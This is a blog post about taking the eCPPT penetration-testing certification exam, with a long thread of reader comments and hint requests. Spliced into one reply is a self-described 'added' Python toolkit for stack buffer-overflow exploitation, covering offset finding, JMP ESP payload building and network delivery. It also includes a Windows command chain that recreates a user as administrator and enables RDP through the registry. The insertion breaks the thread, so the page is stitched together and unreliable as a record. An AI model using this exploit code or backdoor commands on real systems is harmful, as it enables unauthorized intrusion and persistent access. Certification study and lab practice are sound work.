eCPPT Exam

Now, obviously my memory will be a bit hazy as it has been over three months, and I don’t want to include any exam spoilers, but I will do my best to describe the exam and my process.

Day 1 (2/14)
——-
I started off the evening with a nice, romantic Valentine’s Day dinner at Taco Bell with 2 close friends.

The exam kicks off at 9:28pm, and I have nothing but my wits, skills, and 6 Sugar Free Amp energy drinks to help me.

Day 1 was mostly enumeration: mapping the network and the externally facing systems. Some planning too, but I've never been great at that.

TONS OF SCREENSHOTS (Evernote is my hero)

Day 2
——-
Some progress as of 24 hours and 3 energy drinks in (~144 hours and 3 energy drinks remaining), but too early to tell.

According to the VM timer I spent around 10+ hours in the environment this day, and didn’t get too burnt out (yet).

Day 3
——-
A bit more progress (and a lot more frustration) as of ~48 hours and 4 energy drinks in, but a lot to go.

Day 5
——-
(no day 4 update)
After ~76 hours and 5 energy drinks (~92 hours and 1 energy drink remaining) I did not make any more progress, other than increased frustrations.

At this point I start to go back over everything both network and lab wise, to try to decide what I might be missing or forgetting.

Additionally, I’m taking screenshots and noting everything down, to prepare for my report.

This is also the point where I start trying to randomly brute force EVERYTHING…not the best solution.

Day 6
——-
~122 hours and 6 energy drinks in (~46 hours and 4 energy drinks (thanks to a friend for the surprise) remain), and I’m making progress again.

Always remember that there are multiple ways to attack something, and multiple payloads to try. This caused me no shortage of frustration (TRY MORE THAN ONE PAYLOAD NEXT TIME).

“All” that I have left at this point is some custom exploit dev and the DMZ.

Day 6 night/7 morning
——-
The custom exploit dev went along without too many hitches, and ended with a pretty interesting solution (this shouldn't be a spoiler). Instead of a more standard payload, which I was running into issues with, my exploit remotely deleted a user, added that user back, made them an administrator, and then enabled RDP.

At this point I have ~18 hours left and nothing but the DMZ left.

Day 7
——-
As of 11am on the seventh day (~146 hours and 7 energy drinks in), I obtained root level access in the DMZ, thus completing the testing part of the exam.

All that was left at this point was a bit more information (AND SCREENSHOT) gathering, and verifying that I found every vulnerability on the machines instead of just one.

Then I had 7 days to write the report (had 99 pages of unformatted screenshots and notes at this point).

Report
———
While I don’t have many notes on my report itself, I’ll try to give an understanding of how it went.

I started with 99 pages of screenshots and mostly unsorted, unformatted notes.

From here I sorted them out, added headers, and began looking at sample Penetration Test reports.

All in all, my report ended up being 50 pages in total, including an Executive Summary, a Vulnerability report (including remediation steps), and a source code Appendix.

While writing the report wasn’t that hard with all of my notes, it was still something very new to me, and a valuable experience.

The only real advice I could give on this is to take constant screenshots and notes, make sure you have a format in mind, and don't wait until the last minute.

Follow-up
————
As of March 7th @ 12:12pm, I received the following e-mail:
“Our instructors at eLearnSecurity want to congratulate with you and award you with the eLearnSecurity Certified Professional Penetration Tester certificate. You are now an eCPPT!”


Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCP, eCPPT, eWPT, eWPTX, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Penetration Testing Consultant for SecureWorks. His previous position was a Senior Penetration Tester for a major financial institution.

When he’s not figuring out what cert to get next (OSCE?!) or side project to work on, he enjoys playing video games, traveling, and watching sports.

Filed under Security Not Included

92 Responses to eCPPT Exam

  1. Alex

Wow! Does the exam actually last 7 days (report writing aside)?? That's a lot more than the OSCP! Could you also tell me approximately how many machines you had to root?

    • doyler

      Yup, you get 7 days for the attacking portion and then 7 days more for the reporting portion of the exam.

      Definitely a lot more time than the OSCP, but I believe you’re expected to be a bit more thorough and not just root the box in any way possible.

      There was a website, a few internal machines, and then the machine in the DMZ. Overall, under 10 total machines still.

  2. PincoPallino

    Can you write to me at my email?

I want to ask you some questions!

  3. Sasha

    Hello.
    I want to ask a few questions.
    Can you write to me at my email?

  4. Alessandro Rocchi

    Hi Ray
    Can I ask you some questions?
    Can you contact me at my email address?
Thank you 😉

  5. Joel

Hi, can I ask you some questions?

    Hope you reply to my email.
    Thank you!

  6. Alejandro

Hello Doyle, I really enjoyed your review of the eCPPT exam, it was really insightful. I will do my exam next week and I am studying all the material where I consider I have a few flaws. However, I want to ask you some questions about it, if possible of course!

So if you have time, I would really appreciate it if you could help me get more insight into this!

Thank you in advance….

    Best regards…

    Alex

    • Hi Alex,

      Sure, what in particular do you have questions about/how would you like me to contact you?

      Good luck with your exam regardless!

      (Oh, I didn’t delete your comment by the way, I just hadn’t approved it yet)

      Ray

    • John

I tried the eCPPT exam but got very badly stuck on the system security section. I found the executable/Python files and downloaded them to a captured server, where I had already uploaded Immunity with mona. The rest should have been a piece of cake: found the number of bytes to reach EIP practically (the Immunity and mona pc script did not bring results), then found a jmp esp with mona, constructed the entire exploit with a reverse TCP payload and set my reverse handler. All fine, routed the exploit to the victim machine, but never got a shell. 7 jmp esp / call esp addresses returned by mona, all tried, but nothing. I disabled DEP, but still nothing. A null session did not give me anything. Any advice?

      • If your exploit is working locally, then it might be an issue with your payload. There could be an antivirus or firewall blocking the payload that you are trying. Have you tried more than just the one reverse tcp payload yet? That is most likely the issue.

        • John

          Good evening again,
Regarding your last reply: indeed I insisted a lot, and that cost me time and a fail; no local buffer overflow and exploitation was achieved locally. Actually, the app seems to go wrong (overflow) but I could not manage anything more. Though I have found, using alternately the Python script (foophonescustomersmanager.py) and the foo..manager.exe, that there should be some kind of customer ID policy: only numerical characters, with length up to seven. Alphanumerical input returned errors on the .py, and the .exe showed that it was reading up to seven chars from the ID. A random test returned two users. So I wrote a bash script to brute-force the application, feeding it possible combinations created with crunch (actually I wrote my own script instead of using crunch) and take all the users' data… but no time left. Then I think I should try this info with net use or any other SMB tool to get a connection to the shares. The server is vulnerable to null session, but only that; not much luck. I tried to sniff with Wireshark, nothing. Analyzed pcaps with tshark and bro, still nothing. There should be some other application running on the server, although it warns that the older web app has not been set offline. Not clear yet what I have to do. Now I am writing my report and waiting for better chances next week. This phase seems very tricky, but I am optimistic; if I pass it I will reach the end. Thank you.

  7. Charly

    Thinking about taking this one, it looks really interesting.

I read on many sites that they give you a lab with an objective, but achieving that objective is not the way to pass. So, are you supposed to break anything?

    • Hi Charly,

      It was interesting, and definitely enjoyable. As far as the labs are concerned, they are separate from the exam.

      The exam has a necessary, but not sufficient, objective that you need to reach. You still need to perform a full penetration test and report every vulnerability that you find in the network.

      That make sense?

  8. Diego

    Hi Doyler,

I just discovered your blog and I want to ask one question. I'm on the third day of my exam and I've been stuck on the exploit development since day two. I'm a little confused and it's driving me crazy. Do you have some advice on how to approach it? Maybe some resources to learn more and crack that exploit? Thank you. I'll give you my email: gx9293@gmail.com

      • Diego

Hello Doyler, thank you for the resources. I'm into them right now because I failed terribly in the exam ;( My exploit didn't work and I was not able to compromise any other computer in the corporate network. So I came to you again, hopefully you can give me one hint, because I am very frustrated.
I was able to detect the other computer in the corp network, one XP with some SMB sharing services open, for example IPC$, but when I try to connect to dig for more info, I can't. I simply can't access it; the computer tells me Access denied. So my suspicion is that I can only advance in the exam if I successfully write the exploit for the computer listening on that service? Or can I enter the corporate network by compromising another computer? Because I think I tried everything but I can't get into any other computer; it's the exploit that is driving me crazy. So if you can tell me if there is another way to enter the corporate network by compromising another computer, I would very much appreciate that, please!!!

Regarding the post, you can delete it before you authorize it, and you have my email; I just hope you have the time to read it.

        thank you Doyler and have a nice day!!

I'm sorry about that, but hopefully those resources help you brush up on your buffer overflows!

          If you are unable to connect with an SMB client for more info, then anonymous access is probably disabled. In that case, you might want to scan for SMB vulnerabilities, to see if you can find any. For example, using NMAP NSE scripts – https://nmap.org/nsedoc/scripts/smb-vuln-cve2009-3103.html (hint: smb-vuln-* will use all available NSE scripts that start with that).

          As far as the buffer overflow is concerned, yes, that is the only way to compromise the machine that is running that application.

          You’re welcome, and good luck.

          • Hello Doyler,

Thank you for your advice. I tried to use NSE but without any successful result; when you use proxychains, NSE scans will not work. I tried redirecting the traffic to the specific port I wanted to connect to, and in that way I was able to use NSE. However, when I try to scan for vulnerabilities the session closes, because the scan is too noisy I think.

Maybe my routing is wrong and I need to use something else instead of Metasploit?

Thank you Doyler for your advice, and happy new year!!!

Yea, you might be able to get the NSE scripts to route through a proxy (I think sshuttle might work instead).

            But yea, it could just be a routing issue.

            That said, you may be able to scan for the SMB vulnerabilities more manually with SMBclient/exploits through your proxy chains.

        • Kate

          Hey Diego,
          What’s your email address?

  9. kate

    Hi Doyler,

    I’m currently doing my eCPPT exam, and I need your help.

    So far I got the highest privilege shell on the web server, but I can’t exploit the DMZ or any machine in the corporate network. I can only scan the corporate machines and identify two Windows hosts. I also found the .exe and .py files hosted on one of the corporate machines, which I know I have to overflow the buffer.

    Do the .exe and .py files have something to do with exploiting the corporate network or are they just there for me to prove they have buffer overflow vulnerabilities?

    I’m completely stuck right now. Please…Point me in the right direction. Give me a hint. Anything.

    Thanks in advance. (Sorry I spoiled a bit so reply to this message to my private email if possible)

    • Hi Kate,

      You haven’t spoiled too much, but I can edit your comments if you do.

      As far as the .exe and .py are concerned, they are in reference to the buffer overflow that you know you need to exploit. You’ll need to utilize them to write and test your buffer overflow. Once you have it completed, you’ll need to see if you can find a remote version of it listening somewhere…

      Good luck!

      • Kate

        Yo Doyler,

The good news is I proceeded to root two more machines in the corporate network 🙂 The bad news is I'm now completely stuck not knowing how to root the DMZ 🙁 I got one user's FTP credentials but when I RDP'd in there was nothing in the DMZ server. On top of that it doesn't respond to port scans so I have no way of fingerprinting it, meaning I can't run a backdoor on the DMZ server's behalf. Please Doyler…Guide me.

        Am I supposed to mount password and MitM attacks against the DMZ or something? Oh man am I lost…

        • Awesome, that’s some good progress at least.

          You definitely don’t need to perform any password or MiTM attacks.

          If you have FTP creds, and you can RDP, then that’s a great start. If you couldn’t actually get RDP to work, then maybe you need to try a different venue. Also make sure to exfiltrate as much information as possible from the machines that you do manage to exploit.

  10. steve

    Hey Doyler

    Can you write to me at my email?

I want to ask you some questions!

    thanks
    Steve

  11. marco

    HI Man
    Congratulations for your cert.
I am doing the exam, and I want to ask you some things. I don't want to spoil it here!
    Can you write to me at my email?

    Thanks a lot

  12. ericsoe

Is the eCPPT a requirement for the OSCP exam? I failed the OSCP once, on my first attempt. Should I extend the lab and try again, or should I get the eCPPT first? Appreciate your help!

    Thanks in advance,
    – eric

  13. ericdoe

OMG! Thank u so much! Highly appreciated 🙂

  14. John

    Hi Doyler,

    Great post and well done.

    I appreciate it if you could send me an email to ask you a question.

    Thanks.

  15. Stefano Brugis

    Hi Ray
    Can I ask you some questions?
    Can you contact me at my email address?
    Thank you

  16. mapo

Wow! I've already taken the eJPT cert and now I am studying to obtain the eCPPT.
I have to admit I'm going slowly with the course, but personally I need a lot of time to re-elaborate things.
As I work as a web developer, the web app part of the course was much, much easier than the system security section. I'm struggling a bit with that, I admit it! Any general tips to understand the BOF and the shellcoding better?
I hope I can take the exam before October; I can't wait to obtain the cert.
    Ps. i’ve discovered this blog 10 minutes ago and i really enjoyed the article and the comments.
    Bye,
    Mapo

  17. Tai

    Hi Doyler,

Can I say, great article and really kind of you to respond to everyone's comments. I'm looking to sit the PTP exam this weekend, not sure I'm ready but thought I'd give it a go. I made notes of all the lab solutions but haven't had time to go through them again, and also noted all the important commands from various sections which I'm hoping to use during the exam.

Any last minute tips before the exam? It would be good to have some useful advice, as I'm a little worried I won't know where to start and will then try everything instead of using a structured approach; nerves do that to a person!
    The other concern I have is around the Buffer Overflow, finding it and then creating a script from scratch to talk to an application if this isn’t similar to what we’ve been taught in the labs.

Looking forward to your wisdom 🙂

    Thanks

    • Hi Tai,

      I’m always glad to help people, and best of luck with the exam!

      I think just going over everything in the course, this post, and any common questions that people might have (see the comments) would be more than enough.

      Make sure you stick to your workflow as best as possible, and keep good notes.

      The buffer overflow isn’t difficult as long as you follow the steps that the course taught. Additionally, there is a comment here with a TON of resources for more practice if you’d like.

      Good luck again!

  18. Tai

    Hi Doyler,

    Struggling a little here, [spoilers redacted]. Much appreciated!

    • Sorry, don’t want to give too much away, but make sure you go back over the course material and your labs!

      • Tai

        Hi Doyler,

I've made some good progress, managed to get through to the end location (don't want to give too much away) but can't seem to find a way to exploit the device.
I've not tackled the buffer overflow as yet; I'm just a little confused as to how I'm meant to do it without being able to put the server into Immunity and see it overwriting EIP. Any suggestions?
        The labs taught us to use the graphical ftp client application which then connects to a server with malicious payload within a script.

        • Tahir Hussain

          Hi Doyler,

          Thought I’d let you know I managed to root the tricky box and only now leaves me with the Buffer Overflow, will run out of time for that it looks like.

        • Tahir Hussain

          Hi Doyler,

          Thought I’d let you know I managed to successfully overflow the buffer!

          Thanks

          • Congrats, and glad to hear that!

            Hopefully you managed to get everything, or at least know what you might be missing for the retake.

            Let me know how it goes.

  19. Mikey

    Hello Doyler,

    Thinking about doing the course soon instead of OSCP, as per recommendation, but a little hesitant with Buffer Overflows. Was wondering, does the Buffer Overflow for the exam require you to overcome SEH, stack canary, ASLR or DEP?

    I’ve historically had problems with overcoming stack canaries in my line of work, so wanted to understand if this was the case. Also, are you tied to a particular programming language or can you use perl, c++?

Thank You 🙂

    • Hi Mikey,

Nowhere near anything like that for this buffer overflow (or the OSCP to be honest). Both of them are functionally the same:

      Overflow buffer, control EIP, find JMP, make simple JMP to shellcode, win.

      The OSCE is going to be the first course offered by either that will start with any of those topics.

      As far as languages are concerned, you aren’t constrained to any. A lot of the examples will be in Python or C depending on relevance, but anything you write (or use) can be in the language of your choice.
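The steps in the reply above (overflow the buffer, control EIP, find a JMP ESP, jump to shellcode), together with the post's non-standard "delete the user, add it back, make it an administrator, enable RDP" payload from Day 6/7, as an added Python example. This is not code from the original post, the course, or the author: the JMP ESP address, the bad-character list, the placeholder shellcode and the target host/port/protocol prefix are assumptions for illustration only, not values from the exam.

```python
"""Stack-based buffer-overflow helpers: cyclic pattern, EIP offset, payload.

Added example, not code from the original post or the course. It implements
the thread's recipe offline: overflow the buffer, find the offset that lands
in EIP, point EIP at a JMP ESP, land in shellcode. The JMP ESP address, the
bad-character list and the shellcode bytes are placeholders (assumptions).
"""
import socket
import string
import struct

# Bytes the target is assumed to mangle (NULL, LF, CR); confirm the real
# list in the debugger before trusting any payload built from it.
BAD_CHARS = b"\x00\x0a\x0d"


def cyclic_pattern(length: int) -> bytes:
    """Aa0Aa1Aa2... pattern (same scheme as Metasploit's pattern_create),
    so any 4-byte window identifies its own offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks).encode()[:length]
    raise ValueError("pattern length exceeds the 20280-byte maximum")


def eip_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the 4 bytes that landed in EIP (same idea as pattern_offset).
    eip_value is the dword the debugger shows; x86 is little-endian, so the
    bytes are reversed relative to how they appear in the pattern."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not in pattern: wrong endianness or pattern too short")
    return idx


def bad_chars_in(data: bytes, bad: bytes = BAD_CHARS) -> set:
    """Forbidden byte values present in data (empty set means clean)."""
    return {b for b in data if b in bad}


def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nop_sled: int = 16) -> bytes:
    """padding | JMP ESP address (little-endian) | NOP sled | shellcode.
    After the overwritten return address is popped, ESP points just past it,
    so JMP ESP lands in the NOP sled and slides into the shellcode."""
    ret = struct.pack("<I", jmp_esp)
    if bad_chars_in(ret):
        raise ValueError("JMP ESP address contains a bad character; pick another")
    if bad_chars_in(shellcode):
        raise ValueError("shellcode contains bad characters; re-encode it")
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def rdp_admin_command(user: str, password: str) -> str:
    """Command chain in the spirit of the post's 'delete the user, add it
    back, make it an administrator, enable RDP' payload (assumed recreation,
    not the author's exploit). Use it as CMD= for an exec-style payload when
    a reverse shell never calls back; fDenyTSConnections=0 turns RDP on."""
    return " & ".join([
        f"net user {user} /delete",
        f"net user {user} {password} /add",
        f"net localgroup administrators {user} /add",
        'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
        "/v fDenyTSConnections /t REG_DWORD /d 0 /f",
    ])


def send_payload(host: str, port: int, payload: bytes, prefix: bytes = b"") -> None:
    """Deliver the payload to the listening service; prefix is whatever the
    protocol expects before the overflowing field (assumed per target)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    pat = cyclic_pattern(600)
    # Constructed here: the EIP value Immunity would show after sending `pat`.
    crashed_eip = struct.unpack("<I", pat[16:20])[0]
    off = eip_offset(pat, crashed_eip)
    shellcode = b"\xcc" * 32  # placeholder INT3s, not real shellcode
    payload = build_payload(off, 0x625011AF, shellcode)  # placeholder JMP ESP
    print(f"offset={off} payload_len={len(payload)}")
    print(rdp_admin_command("pentest", "P@ssw0rd123"))
    # send_payload("10.0.0.5", 9999, payload, prefix=b"ID=")  # assumed host/port/prefix
```

Run it stand-alone to see the recovered offset and payload length; for a real target, swap the placeholder shellcode for msfvenom output (for instance windows/exec with CMD set to the string rdp_admin_command returns) and take the JMP ESP address from mona. If a reverse shell never connects back even though the crash is reliable, change the payload type before touching the overflow again, which is exactly the "try more than one payload" lesson from the post.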

      • Mikey

        Thanks Doyler!

        A little less scared now! I’m assuming you have a suitable machine without security parameters, such as XP (based on some stuff I’ve read) to run the exploit from or are you expected to do this in Kali? I’ve obviously only practised this on Windows XP to date (old PTB course) and not Linux.

I'll try and read up as much as I can, probably wait for a voucher or discount first 🙂

        Thanks

        • I do have an XP machine that I use for some exploit development, but you do not need it for the course.

          You’ll be provided with the VM and appropriate vulnerable software in both the lab, as well as the exam, environment.

          Good luck, and let me know how it goes!

  20. john

    Hello Doyler,

Thanks in advance for your feedback. I have already compromised the web server and 3 machines on the network, including the exploit dev one. I have FTP for the DMZ but I got stuck on this; can you give any hint?
And should I compromise all the machines on the network?

    • Hi John,

      I’m sorry that I can’t give you any hints, but good luck with the machine!

      You should try to compromise every machine in the network that you find, but your goal is to find every vulnerability. If you can’t get a partial, or even full compromise, then that doesn’t necessarily mean that you missed something.

  21. Tai

    Hi Doyler,

    Would it be possible to send you a PM, not necessarily about the exam.

    Thanks

  22. Mokaz

    Hey there Doyler,

    I’ve been through OSCP & OSCE. I’m actually thinking about getting a 4 in the Box @ eLearnSecurity. Targets are eCPPT, eCRE, eNDP & eWPTX.

    Do you think this makes sense, or will i be bored?

    Thanks

    • Hey Mokaz,

      Awesome, and grats on your OSCE! I’m hoping to have mine done by the end of this year myself.

      I love the 4 in a Box, though I’ve never taken the eNDP personally.

      eCPPT – you’ll probably be bored a little to be honest, as it is VERY similar to the OSCP. That said, if you see anything in the syllabus that you don’t know, it might be ok. Your other options for this slot would be another defensive course, eMAPT, or even eWPT.

      eCRE – I haven’t finished yet, but it should still be plenty useful and fun.

      eWPTX – you won’t be bored at all, a great course.

  23. Tai

    Hi Doyler,

Thought I'd let you know, I passed my eCPPT. Thanks for your advice on this page, it was invaluable 🙂

    • Awesome, congratulations! Glad that I could at least give some advice.

      • Tai

        Thanks!

For anyone else sitting it, don't be overly stressed about the BO; providing you are familiar with the content in the lab, it will not be too different in the exam. I tackled the BO towards the end, once everything became clear.

  24. Rollix709

    Hey Doyler,

    Looking to get your opinion on a couple things, but not looking for answers or anything of the sort. More informational if you’re able to help.

    E-mail if you get a chance,

    Thanks!

  25. Susan

    Hi Doyler,
    I’m on my ecppt right now.
I've successfully exploited [sensitive information removed], but I'm stuck with other hosts [sensitive information removed]… I've nmapped them to find out which services run on them and tried common vulns with Metasploit but with no result. Can you tell me where my failure is?

P.S. Above you said you used "more than one payload"; I tried different payloads but with no result.
    Thank you in advance!

    • Hi Susan,

      First, I’ve removed any spoilers from your comment as to not spoil it for others. Remember, this is a penetration test, so your job is to find as many vulnerabilities as possible and then report it to the client, that’s it.

      As far as the “more than one payload” is concerned, if a different payload didn’t work, then you might be fine.

      Good luck!

  26. waqas ahmed farooqi

    Hello Doyler
Seen your posts, loved your supportive attitude.
Hope you are well. I am an information security professional and currently interested in the eLearnSecurity eCPPT certification. I need some help, so please answer the following questions.

1. Will the eCPPT paper be given from home?
2. After registration, within how much time must the eCPPT paper be given?

    • Hi, glad you enjoy my posts, and hopefully I can help!

You take the eCPPT exam from home, using the same VPN connectivity you use for the lab environments. There is no paper per se, but a penetration testing engagement followed by the report.

      That depends on which version of the course you sign up for. The Barebone edition doesn’t have an exam, the Full gives you 180 days to complete the course from the day you begin, and there is no time limit for the Elite version.

      • waqas ahmed farooqi

        Thanks a lot for your response, so nice of you brother. If possible please share some resources which will help in the preparation of eCPPT certification.

Other than the course materials, you don't really need anything in preparation for the course or exam.

          That said, if you struggle or think you will struggle with the buffer overflow, then the above comments should have everything you’ll need!

          Let me know when you sign up, and how it goes.

  27. Josh

    Hey Doyler,

Thank you so much for the review! I'm currently taking the course, and it's always fun to read reviews of the course and exam. Do you have tips (without spoiling anything) on what to review or be sure to know for the exam? The labs that they provide are pretty good, but I'm probably overthinking that the exam is going to be 4x harder than the labs.

    • Other than maybe a few of the links in the comments above, you should be good!

      The course material covers everything in the exam, you just need to make sure that you understand what you’re doing.

Follow your process (Information Gathering -> Enumeration -> Exploitation -> Post-Exploitation -> Information Gathering), document everything, and you'll be good to go.

      That + make sure you understand how to do a basic stack-based buffer overflow.
